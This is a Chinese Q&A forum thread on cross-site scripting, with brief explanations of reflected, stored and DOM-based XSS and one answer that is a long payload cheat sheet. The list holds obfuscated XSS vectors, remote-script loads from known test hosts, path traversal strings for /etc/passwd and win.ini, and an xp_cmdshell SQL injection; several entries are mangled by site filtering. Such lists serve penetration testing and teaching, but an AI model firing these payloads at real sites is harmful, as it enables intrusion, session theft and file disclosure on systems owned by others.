【web安全】跨站脚本攻击工具有哪些

2021-01-06 09:51发布

4条回答
小叮当
2楼 · 2021-01-06 10:10

XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其他用户使用的页面中。XSS是针对Web站点的客户隐私的攻击,当客户详细信息失窃或受控时可能引发彻底的安全威胁。大部分网站攻击只涉及两个群体:黑客和 Web 站点,或者黑客和客户端受害者。与那些攻击不同的是,XSS 攻击同时涉及三个群体:黑客、客户端和 Web 站点。XSS 攻击的目的是盗走客户端 cookies,或者任何可以用于在 Web 站点确定客户身份的其他敏感信息。手边有了合法用户的标记,黑客可以继续扮演用户与站点交互,从而冒充用户。 
举例来说,可以利用 XSS 攻击窥视用户的信用卡号码和私有信息。通过利用 Web 站点的访问特权,在受害者(客户端)浏览器上运行恶意的JavaScript代码来实现。这些是非常有限的JavaScript特权,除了与站点相关的信息,一般不允许脚本访问其他任何内容。重点强调的是,虽然 Web 站点上存在安全漏洞,但是 Web 站点从未受到直接伤害。但是这已经足够让脚本收集 cookies,并且将它们发送给黑客。 
跨站脚本攻击有两种攻击形式: 
1. 反射型跨站脚本攻击 
攻击者会通过社会工程学手段,发送一个URL连接给用户打开,在用户打开页面的同时,浏览器会执行页面中嵌入的恶意脚本。 
2. 存储型跨站脚本攻击 
攻击者利用web应用程序提供的录入或修改数据功能,将数据存储到服务器或用户cookie中,当其他用户浏览展示该数据的页面时,浏览器会执行页面中嵌入的恶意脚本。所有浏览者都会受到攻击。 
3. DOM跨站攻击 
由于html页面中,定义了一段JS,根据用户的输入,显示一段html代码,攻击者可以在输入时,插入一段恶意脚本,最终展示时,会执行恶意脚本。 
DOM跨站和以上两个跨站攻击的差别是,DOM跨站是纯页面脚本的输出,只有规范使用javascript,才可以防御。

小磊子
3楼 · 2021-01-06 10:28
  1. 1'"()&%<acx><ScRiPt >prompt(915149)ScRiPt>

  2. <svg/onload=alert(1)>

  3. <script>alert(document.cookie)script>

  4. '><script>alert(document.cookie)script>

  5. ='><script>alert(document.cookie)script>

  6. <script>alert(vulnerable)script>

  7. [removed]alert('XSS')[removed]

  8. <script>alert('XSS')script>

  9. <img src="[removed]alert('XSS')">

  10. <script>alert(\"Vulnerable\")script>.jsp

  11. "[removed]alert("xss")[removed]

  12. ../../../../../../../etc/passwd

  13. ../../../../../windows/win.ini

  14. [removed]alert("xss")[removed]

  15. [removed]alert("xss")[removed]

  16. [removed]alert("xss")[removed]/index.html

  17. <script>alert('Vulnerable');script>

  18. <script>alert('Vulnerable')script>

  19. a.jsp/<script>alert('Vulnerable')script>

  20. a?<script>alert('Vulnerable')script>

  21. "><script>alert('Vulnerable')script>

  22. ';exec master..xp_cmdshell 'dir c: > c:\inetpub\wwwroot\?.txt'--&&

  23. ">[removed]alert([removed])[removed]

  24. [removed]alert(document. domain);[removed]&

  25. [removed]alert(document.domain);[removed]&SESSION_ID={SESSION_ID}&SESSION_ID=

  26. <IMG src="[removed]alert('XSS');">

  27. <IMG src=[removed]alert('XSS')>

  28. <IMG src=[removed]alert('XSS')>

  29. <IMG src=[removed]alert("XSS")>

  30. <IMG src=[removed]alert('XSS')>

  31. <IMG src=[removed]alert('XSS')>

  32. <IMG src=[removed]alert('XSS')>

  33. <IMG src="[removed]alert('XSS');">

  34. <IMG src="[removed]alert('XSS');">

  35. <IMG src="[removed]alert('XSS');">

  36. "<IMG src=java\0script:alert(\"XSS\")>";' > out

  37. <IMG src=" [removed]alert('XSS');">

  38. <SCRIPT>a=/XSS/alert(a.source)SCRIPT>

  39. <BODY BACKGROUND="[removed]alert('XSS')">

  40. <BODY ONLOAD=alert('XSS')>

  41. <IMG DYNSRC="[removed]alert('XSS')">

  42. <IMG LOWSRC="[removed]alert('XSS')">

  43. <BGSOUND src="[removed]alert('XSS');">

  44. <br size="&{alert('XSS')}">

  45. <LAYER src="http://xss.ha.ckers.org/a.js">layer>

  46. <LINK REL="stylesheet" href="[removed]alert('XSS');">

  47. <IMG src='[removed]msgbox("XSS")'>

  48. <IMG src="mocha:[code]">

  49. <IMG src="livescript:[code]">

  50. <META HTTP-EQUIV="refresh" CONTENT="0;url=[removed]alert('XSS');">

  51. <IFRAME src=[removed]alert('XSS')>IFRAME>

  52. <FRAMESET><FRAME src=[removed]alert('XSS')>FRAME>FRAMESET>

  53. <TABLE BACKGROUND="[removed]alert('XSS')">

  54. <DIV STYLE="background-image: url([removed]alert('XSS'))">

  55. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">

  56. <DIV STYLE="width: [removed]alert('XSS'));">

  57. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';STYLE>

  58. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>

  59. <STYLE TYPE="text/javascript">alert('XSS');STYLE>

  60. <STYLE TYPE="text/css">.XSS{background-image:url("[removed]alert('XSS')");}STYLE><A class="XSS">A>

  61. <STYLE type="text/css">BODY{background:url("[removed]alert('XSS')")}STYLE>

  62. <BASE href="[removed]alert('XSS');//">

  63. getURL("[removed]alert('XSS')")

  64. a="get";b="URL";c="[removed]";d="alert('XSS');";eval(a+b+c+d);

  65. <XML src="[removed]alert('XSS');">

  66. "> <BODY><SCRIPT>function a(){alert('XSS');}SCRIPT><"

  67. <SCRIPT src="http://xss.ha.ckers.org/xss.jpg">SCRIPT>

  68. <IMG src="[removed]alert('XSS')"

  69. --#exec cmd="/bin/echo '[removed]-->

  70. <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

  71. <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js">SCRIPT>

  72. <SCRIPT =">" src="http://xss.ha.ckers.org/a.js">SCRIPT>

  73. <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js">SCRIPT>

  74. <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js">SCRIPT>

  75. <SCRIPT>document.write(");SCRIPT>PT src="http://xss.ha.ckers.org/a.js">SCRIPT>

  76. <A href=http://www.gohttp://www.google.com/ogle.com/>linkA>

  77. <IMG SRC=[removed]alert(‘XSS’)>

  78. <IMG SRC=# onmouseover=”alert(‘xxs’)”>

  79. <IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”>img>

  80. <img src=x onerror=”[removed]alert('XSS')″>

  81. <IMG SRC=[removed]alert(

  82. &#39;&#88;&#83;&#83;&#39;&#41;>

  83. <IMG SRC=[removed]alert('XSS')>

  84. <IMG SRC=”jav ascript:alert(‘XSS’);”>

  85. <IMG SRC=”[removed]alert(‘XSS’);”>

  86. <IMG SRC= &#14[removed]alert(‘XSS’);”>

  87. <<SCRIPT>alert(“XSS”);//<SCRIPT>

  88. <IMG SRC=”[removed]alert(‘XSS’)”

  89. script><script>alert(‘XSS’);script>

  90. <INPUT TYPE=”IMAGE” SRC=”[removed]alert(‘XSS’);”>

  91. <BODY BACKGROUND=”[removed]alert(‘XSS’)”>

  92. <svg/onload=alert('XSS')>

  93. <IMG SRC=’[removed]msgbox(“XSS”)’>

  94. <BGSOUND SRC="[removed]alert('XSS');">

  95. <BR SIZE="&{alert('XSS')}">

  96. <LINK REL="stylesheet" HREF="[removed]alert('XSS');">

  97. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';STYLE>

  98. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

  99. <STYLE>.XSS{background-image:url("[removed]alert('XSS')");}STYLE><A CLASS=XSS>A>

  100. <STYLE type="text/css">BODY{background:url("[removed]alert('XSS')")}STYLE>

  101. <XSS STYLE="behavior: url(xss.htc);">

  102. <IFRAME SRC="[removed]alert('XSS');">IFRAME>

  103. <FRAMESET><FRAME SRC="[removed]alert('XSS');">FRAMESET>

  104. <TABLE><TD BACKGROUND="[removed]alert('XSS')">

  105. <DIV STYLE="width: [removed]alert('XSS'));">

  106. <SCRIPT a=">" SRC="httx://xss.rocks/xss.js">SCRIPT>

  107. <script>alert(/xss/)script>

  108. <svg onload=alert(document.domain)>

  109. <img src=document.domain onerror=alert(document.domain)>

  110. <M onmouseover=alert(document.domain)>M

  111. <marquee onscroll=alert(document.domain)>

  112. <a href=[removed]alert(document.domain)>Ma>

  113. <body onload=alert(document.domain)>

  114. <details open ontoggle=alert(document.domain)>

  115. <embed src=[removed]alert(document.domain)>

  116. <script>alert(1)script>

  117. <sCrIpT>alert(1)sCrIpT>

  118. <ScRiPt>alert(1)ScRiPt>

  119. <sCrIpT>alert(1)ScRiPt>

  120. <ScRiPt>alert(1)sCrIpT>

  121. <img src=1 onerror=alert(1)>

  122. <iMg src=1 oNeRrOr=alert(1)>

  123. <ImG src=1 OnErRoR=alert(1)>

  124. <img src=1 onerror="alert("M")">

  125. <marquee onscroll=alert(1)>

  126. <mArQuEe OnScRoLl=alert(1)>

  127. <MaRqUeE oNsCrOlL=alert(1)>

  128. <a href=[removed]/0/,alert("M")>Ma>

  129. <a href=[removed]/00/,alert("M")>Ma>

  130. <a href=[removed]/000/,alert("M")>Ma>

  131. <a href=[removed]/M/,alert("M")>Ma>

  132. <base href=[removed]/M/><a href=,alert(1)>Ma>

  133. <base href=[removed]/M/><iframe src=,alert(1)>iframe>

  134. textarea><script>var a=1//@ sourceMappingURL=//xss.sitescript>

  135. "><img src=x onerror=alert([removed])>.gif

  136. <div style="background-image:url([removed]alert(/xss/))">

  137. <STYLE>@import'http://ha.ckers.org/xss.css';STYLE>

  138. <iframe src=[removed]alert(1)>iframe>

  139. <iframe src=[removed]PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+>iframe>

  140. <iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;>iframe>

  141. <iframe src=https://baidu.com width=1366 height=768>iframe>

  142. <iframe src=[removed]alert(1) width=1366 height=768>iframe

  143. <form action=[removed]alert(1)><input type=submit>

  144. <form><button formaction=[removed]alert(1)>M

  145. <form><input formaction=[removed]alert(1) type=submit value=M>

  146. <form><input formaction=[removed]alert(1) type=image value=M>



霸王龙的龙
4楼 · 2021-01-06 15:22

跨站脚本攻击又被称为xss。xss属于客户端攻击,攻击者在我们的网页中嵌入恶意脚本,当用户使用浏览器浏览这些被嵌入恶意脚本的网页的时候,脚本就会在我们的浏览器中执行。xss攻击的核心方式是 脚本。这些脚本通常是javascript脚本,从这个层面来说javascript能做的事情,xss攻击一般都能做到。比如;获取页面内容,盗取用户cookie,劫持前端逻辑,发送非法请求,盗取页面数据,url跳转等。



相关问题推荐

  • 回答 6

    这个还是因人而异吧,看你自己对哪方面感兴趣,兴趣是最好的老师,感兴趣了才愿意钻研学习下去,简单说一下这两个学习知识方面的不同吧:软件测试岗位虽然对于从业者的知识基础要求不高,但是软件测试岗位所涉及到的知识面还是比较广的,所以软件测试人员也需...

  • 回答 5

    SQL注入漏洞的危害:1、数据库中存储的用户隐私信息泄漏;2、通过操作数据库对某些网页进行篡改;3、修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;4、数据库服务器被恶意操作,系统管理员帐户被窜改;5、数据库服务器提供的操作系统支持,让黑客得以...

  • 回答 16

    一、CISP(Certified Information Security Professional)证书中文叫注册信息安全专业人员,由中国信息安全产品测评认证中心实施的国家认证。可以说,这是目前国内对于个人来说认可度最高的信息安全人员资质,堪称最权威、最专业、最系统。根据实际岗位的不...

  • 回答 14

    渗透测试(也称为pentest)是测试移动应用程序漏洞的过程。此测试的主要目的是确保外部人员的重要数据.通过模拟黑客的思维和攻击手段,对计算机业务系统的弱点、技术缺陷和漏洞进行探查评估。经过客户授权后,在不影响业务系统正常运行的条件下,渗透人员在黑...

  • 回答 1

    网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。主要涉及到的有:1、物理措施:例如,保护网络关键设备(如交换机、大型计算机等),制定严格的网络...

  • 回答 33

      网络安全工程师学习内容:  1、计算机应用、计算机网络、通信、信息安全等相关专业本科学历,三年以上网络安全领域工作经验;  2、精通网络安全技术:包括端口、服务漏洞扫描、程序漏洞分析检测、权限管理、入侵和攻击分析追踪、网站渗透、病毒木马防...

  • 回答 26

      学历不是问题,技术才是硬道理!只要你的技术过硬的话,你完全可以进国家安全部门去工作的。比如公安局里的网监工作,大都是九零后的电脑方面的精英。未必都是本科生。还有从社会上特招进去的。所以说,现在是拿技术说话,不是靠学历吃饭的时代了。  网...

  • 回答 16

    网络安全的知识是比较简单的,比较好入门,好多知识理论,大家都是可以听懂的,这是完全没有问题的。网络安全最终的则是实战的应用,怎么把这些理论知识运用到事件中,这些才是重中之重。所以在选择培训机构的时候,也需要尽量去找这些实践操作多的培训机构。...

  • 回答 22

      能够胜任的岗位主要有:渗透测试工程师、大数据安全工程师、信息安全工程师、安全测试工程师、安全服务工程师、安全运维工程师、系统安全工程师、服务器安全工程师、云计算安全工程师、网络安全工程师、安全分析师、渗透讲师等;  按照web渗透、内网渗透...

  • 回答 23

    一些典型的网络安全问题,可以来梳理一下:IP安全:主要的攻击方式有被动攻击的网络窃听,主动攻击的IP欺骗(copy报文伪造、篡改)和路由攻击(中间人攻击);2. DNS安全:这个大家应该比较熟悉,修改DNS的映射表,误导用户的访问流量;3. DoS攻击:单一攻击...

  • 回答 19

    运维一般是设备或者环境的搭建和维护,网络安全可以看做是防火墙

  • 回答 12

    先说说运维工程师和网络工程师的区别。运维工程师是泛指,网络工程师为特指,所以不能这么对比。你应该这么理解,网络工程师是一个人(也可以是理解成一个岗位),而运维则是他的工作内容。从工作内容上来说,运维可细分为桌面运维、网络运维、服务器运维三大...

没有解决我的问题,去提问